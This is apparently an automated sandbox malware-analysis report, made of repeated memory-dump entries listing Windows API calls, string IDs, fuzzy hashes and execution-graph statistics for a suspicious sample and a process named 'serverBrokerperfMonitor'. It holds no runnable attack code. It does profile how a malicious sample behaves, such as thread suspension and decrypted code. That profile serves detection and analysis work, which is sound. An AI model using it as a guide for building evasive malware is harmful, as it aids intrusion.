                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                  • String ID:
                                                                                                  • API String ID: 2652629310-0
                                                                                                  • Opcode ID: b6eeb14661248b5c55fe1fbcdf2ec818ac179152cdcb5a5b17634dad50f7c87e
                                                                                                  • Instruction ID: b2ea827b7812cf799655839692fe563ca7d3aa76354c98b7b61f1b865cb9f660
                                                                                                  • Opcode Fuzzy Hash: b6eeb14661248b5c55fe1fbcdf2ec818ac179152cdcb5a5b17634dad50f7c87e
                                                                                                  • Instruction Fuzzy Hash: EE31B0B2A1022AABDF24DF64EC51EBE7BA9EF41710B044268FC04E7254E735DD54DB90
                                                                                                  APIs
                                                                                                  • GetDC.USER32(00000000), ref: 0091A666
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0091A675
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0091A683
                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0091A691
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsDevice$Release
                                                                                                  • String ID:
                                                                                                  • API String ID: 1035833867-0
                                                                                                  • Opcode ID: 607634bbb8f49ba6cbd8bab95c531d1dfafda2404a83de7d5cdd7296bfdd92da
                                                                                                  • Instruction ID: e27e4c2e15a8ba7049291364030d09d0c1c078718807e8ad9c1834eed021eb94
                                                                                                  • Opcode Fuzzy Hash: 607634bbb8f49ba6cbd8bab95c531d1dfafda2404a83de7d5cdd7296bfdd92da
                                                                                                  • Instruction Fuzzy Hash: 3BE01231E6A721FBD3615B61BC0DFDF3E58AB06B52F018109FA05961E0DBB486089BA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 0091A699: GetDC.USER32(00000000), ref: 0091A69D
                                                                                                    • Part of subcall function 0091A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0091A6A8
                                                                                                    • Part of subcall function 0091A699: ReleaseDC.USER32(00000000,00000000), ref: 0091A6B3
                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0091A83C
                                                                                                    • Part of subcall function 0091AAC9: GetDC.USER32(00000000), ref: 0091AAD2
                                                                                                    • Part of subcall function 0091AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0091AB01
                                                                                                    • Part of subcall function 0091AAC9: ReleaseDC.USER32(00000000,?), ref: 0091AB99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                  • String ID: (
                                                                                                  • API String ID: 1061551593-3887548279
                                                                                                  • Opcode ID: bbcb553b2f351a82e26744d8ce6814d0d096c90b9bdbbffca6cc063944e9deaa
                                                                                                  • Instruction ID: 58376559f0c0c04280ce00d2439ef255e46bc0d199267e8a3205881502cd6d00
                                                                                                  • Opcode Fuzzy Hash: bbcb553b2f351a82e26744d8ce6814d0d096c90b9bdbbffca6cc063944e9deaa
                                                                                                  • Instruction Fuzzy Hash: 4D91FE71608344AFD610DF25C844A6BBBE9FFC9711F00895EF99AD3220DB70A946DF62
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 009075E3
                                                                                                    • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
                                                                                                    • Part of subcall function 0090A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0090A598
                                                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0090777F
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A501
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A532
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                  • String ID: :
                                                                                                  • API String ID: 3226429890-336475711
                                                                                                  • Opcode ID: c9b939617b49323fa517d84249a4689161cd83683b6eccc45821c3e989a6ce1d
                                                                                                  • Instruction ID: 6430f2a18d9289a7113216d6354054cbb3ea45ca630aad192a9857099d62fe40
                                                                                                  • Opcode Fuzzy Hash: c9b939617b49323fa517d84249a4689161cd83683b6eccc45821c3e989a6ce1d
                                                                                                  • Instruction Fuzzy Hash: 72416071901258ADEB25EB64CC55FEEB37DAF81340F004096B60AA60D2DB746F85CF71
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID: }
                                                                                                  • API String ID: 176396367-4239843852
                                                                                                  • Opcode ID: bb2c840937f83caa2a04629b0e68ff39dc8175150497ed57dd4c6b9776069426
                                                                                                  • Instruction ID: 665460d82057bd5f236428de04308903e32db7f9db9deabcabc23e53bd14e79d
                                                                                                  • Opcode Fuzzy Hash: bb2c840937f83caa2a04629b0e68ff39dc8175150497ed57dd4c6b9776069426
                                                                                                  • Instruction Fuzzy Hash: 5921DE72B0431E5AD731EB64E845FAAB3EEDF91754F04042AF680C3145EB78DD8883A2
                                                                                                  APIs
                                                                                                    • Part of subcall function 0090F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0090F2E4
                                                                                                    • Part of subcall function 0090F2C5: GetProcAddress.KERNEL32(009481C8,CryptUnprotectMemory), ref: 0090F2F4
                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0090F33E), ref: 0090F3D2
                                                                                                  Strings
                                                                                                  • CryptUnprotectMemory failed, xrefs: 0090F3CA
                                                                                                  • CryptProtectMemory failed, xrefs: 0090F389
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CurrentProcess
                                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                  • API String ID: 2190909847-396321323
                                                                                                  • Opcode ID: c33574f99e93d642a71e072b7bec51d6e444faee43bc6379a1f848bb2a8acb76
                                                                                                  • Instruction ID: 24c42a74c5cd9d9ad77acbe706d87a1f356524226f95bafbddefbccc5a343cf3
                                                                                                  • Opcode Fuzzy Hash: c33574f99e93d642a71e072b7bec51d6e444faee43bc6379a1f848bb2a8acb76
                                                                                                  • Instruction Fuzzy Hash: E8112931604225AFDF35AF20DC55A6F3758FF447B0B048166FC415B6D1DB349F419A90
                                                                                                  APIs
                                                                                                  • _swprintf.LIBCMT ref: 0090B9B8
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __vswprintf_c_l_swprintf
                                                                                                  • String ID: %c:\
                                                                                                  • API String ID: 1543624204-3142399695
                                                                                                  • Opcode ID: 8eb33bd7d99ca8158603faae6ad882106de25ab3d28944bd70b493200e7f6889
                                                                                                  • Instruction ID: bb7bf111905ea3a7f516119b9601dcc92e47c08121c5a577a11a0899800561dc
                                                                                                  • Opcode Fuzzy Hash: 8eb33bd7d99ca8158603faae6ad882106de25ab3d28944bd70b493200e7f6889
                                                                                                  • Instruction Fuzzy Hash: 9801F563600322BDDA30AB359C86E6BA7ECEED6770B40880AF554D60C2EB24D844C2B1
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00010000,00911160,?,00000000,00000000), ref: 00911043
                                                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 0091108A
                                                                                                    • Part of subcall function 00906C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00906C54
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                  • String ID: CreateThread failed
                                                                                                  • API String ID: 2655393344-3849766595
                                                                                                  • Opcode ID: 4645adf7adaa34429fdffe8e202a077ebc8853c6d40a810ff415951fe47003d0
                                                                                                  • Instruction ID: 3c82654a8a40b5d571e321cf04fc1dc8b88055a6e7330a8424c57027400e9963
                                                                                                  • Opcode Fuzzy Hash: 4645adf7adaa34429fdffe8e202a077ebc8853c6d40a810ff415951fe47003d0
                                                                                                  • Instruction Fuzzy Hash: 9501DB7534430D7FD3345E649C52FB673A8EB84751F10002EF787561C0DAA168C49A24
                                                                                                  APIs
                                                                                                    • Part of subcall function 0090E2E8: _swprintf.LIBCMT ref: 0090E30E
                                                                                                    • Part of subcall function 0090E2E8: _strlen.LIBCMT ref: 0090E32F
                                                                                                    • Part of subcall function 0090E2E8: SetDlgItemTextW.USER32(?,0093E274,?), ref: 0090E38F
                                                                                                    • Part of subcall function 0090E2E8: GetWindowRect.USER32(?,?), ref: 0090E3C9
                                                                                                    • Part of subcall function 0090E2E8: GetClientRect.USER32(?,?), ref: 0090E3D5
                                                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                  • SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 2622349952-4108050209
                                                                                                  • Opcode ID: d048d7c50afb1f79c7a744dab0ff582d7713aa6ea3579549534f62b0ef8bdadb
                                                                                                  • Instruction ID: 3cc71b8c1254bbac3217f8f0863a239068202d0be0a87db73fda29e2005a7544
                                                                                                  • Opcode Fuzzy Hash: d048d7c50afb1f79c7a744dab0ff582d7713aa6ea3579549534f62b0ef8bdadb
                                                                                                  • Instruction Fuzzy Hash: 42F0AF3110838CAFDF150F608C0DBEA3B9CAF41344F048519FC44509E1CB78C990EB10
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00911206,?), ref: 00910FEA
                                                                                                  • GetLastError.KERNEL32(?), ref: 00910FF6
                                                                                                    • Part of subcall function 00906C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00906C54
                                                                                                  Strings
                                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00910FFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                  • API String ID: 1091760877-2248577382
                                                                                                  • Opcode ID: 7289fc3120199d7a65ac9611a4031f2ff3311a71bdd63a7e50c1373fa567a9d2
                                                                                                  • Instruction ID: d56faa0cf3762ac9d095b330369f2aa51998241f9447bfcde8f8b0acce9fef05
                                                                                                  • Opcode Fuzzy Hash: 7289fc3120199d7a65ac9611a4031f2ff3311a71bdd63a7e50c1373fa567a9d2
                                                                                                  • Instruction Fuzzy Hash: C0D02B315485303AD62433249D06D6E3904CB52331F104708F279511E1CB1449D16A91
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,0090DA55,?), ref: 0090E2A3
                                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0090DA55,?), ref: 0090E2B1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindHandleModuleResource
                                                                                                  • String ID: RTL
                                                                                                  • API String ID: 3537982541-834975271
                                                                                                  • Opcode ID: bc13cb2868dc71f273f7785e5759629f7bd886631d9359dffa13ac4a92134ea6
                                                                                                  • Instruction ID: 0a1780676497a2eb135f782a4fe1a07a5468f8e4ce198afb734a16c8b88f2844
                                                                                                  • Opcode Fuzzy Hash: bc13cb2868dc71f273f7785e5759629f7bd886631d9359dffa13ac4a92134ea6
                                                                                                  • Instruction Fuzzy Hash: 56C0123169A7106AEA3427686D4DB836A585B00B16F094948B281EE2D1DAA5C980DAA0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine
                                                                                                  • String ID: `%t
                                                                                                  • API String ID: 3253501508-135100400
                                                                                                  • Opcode ID: 07bbe19662da8b5953cfa5a8bfb8c3c6bfe7aae9f53cbd94a17f3a423a374fd7
                                                                                                  • Instruction ID: 16e89c2888939a233d6a8c17c2f186f6adbfaf43b292d0251859e25ddbfca69b
                                                                                                  • Opcode Fuzzy Hash: 07bbe19662da8b5953cfa5a8bfb8c3c6bfe7aae9f53cbd94a17f3a423a374fd7
                                                                                                  • Instruction Fuzzy Hash: 9BB092B887C7088FD7008FB0F80C0047BA0BA08302380985BD802C6730DB744189FF00

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.8%
                                                                                                  Dynamic/Decrypted Code Coverage:75%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:12
                                                                                                  Total number of Limit Nodes:0
                                                                                                  (execution graph rendering omitted: four short paths, calling GetFileAttributesW, CloseHandle, ResumeThread and SuspendThread respectively)

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cddf4eaaddad0ef8741f5d5e8d1001d66a22a784ad4073ca9bff2335aad1748d
                                                                                                  • Instruction ID: fe13b690017c2a8829cef46b3603bf3ae1f62373c649be1fe1d6968b7eaf0bda
                                                                                                  • Opcode Fuzzy Hash: cddf4eaaddad0ef8741f5d5e8d1001d66a22a784ad4073ca9bff2335aad1748d
                                                                                                  • Instruction Fuzzy Hash: 98A1C271A1898D9FEB98DB68D865BA97FE1FF55310F0001BEE009D72D6DB782841CB40

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c9$!k9
                                                                                                  • API String ID: 0-3254877420
                                                                                                  • Opcode ID: b5ca1b83ae477db99f7afbd5e17e07ed95a200bfa5cfa14eabd018e335ca11bb
                                                                                                  • Instruction ID: b64002f6e75f6f1d4906d3e8de79d3bbeb609f0fb942b40dbb53c63756e32d5a
                                                                                                  • Opcode Fuzzy Hash: b5ca1b83ae477db99f7afbd5e17e07ed95a200bfa5cfa14eabd018e335ca11bb
                                                                                                  • Instruction Fuzzy Hash: 0311AF32A2824D9FDB44DF6CD8919EA37A4FB98324B010176F849D7261C730A565CB91

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 6406da5930fb70b9375b22125064065babfe1a1901fa48937fbcfb575280a854
                                                                                                  • Instruction ID: f1e53d4baa65e373ba73b8cb58249d3fab849be573b9a85d9ff336117a398c2b
                                                                                                  • Opcode Fuzzy Hash: 6406da5930fb70b9375b22125064065babfe1a1901fa48937fbcfb575280a854
                                                                                                  • Instruction Fuzzy Hash: 01514A7090978C8FDB55DFA8C854AE9BBF0FF56310F1441ABD049DB2A2DA399846CB11

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: SuspendThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3178671153-0
                                                                                                  • Opcode ID: a2a122b7c698c668747bfb5f2f511d49a4502a200567cd0f7d0de3c1fdd3a003
                                                                                                  • Instruction ID: 1ca8de0bd4f914b64fd248a5eb83c811d0e1474073c9afd1271d1b61d582b1f9
                                                                                                  • Opcode Fuzzy Hash: a2a122b7c698c668747bfb5f2f511d49a4502a200567cd0f7d0de3c1fdd3a003
                                                                                                  • Instruction Fuzzy Hash: 6C415C70E08A4D8FDF58DF98C895BEDBBF0FB5A310F10416AD449E7292DA70A845CB41

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 90546486bf730c7229643badcf29c3186f9571a0b098dffc0b07c47280cf1e05
                                                                                                  • Instruction ID: 932ddac39b675bd982c8f4eaa2e6e2caa6d72e9b2b93b6995e2ebd02d05523b4
                                                                                                  • Opcode Fuzzy Hash: 90546486bf730c7229643badcf29c3186f9571a0b098dffc0b07c47280cf1e05
                                                                                                  • Instruction Fuzzy Hash: 67410A70E0864C8FDB98DF98D895BEDBBF1FB5A310F10416ED049E7252DA71A885CB41

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
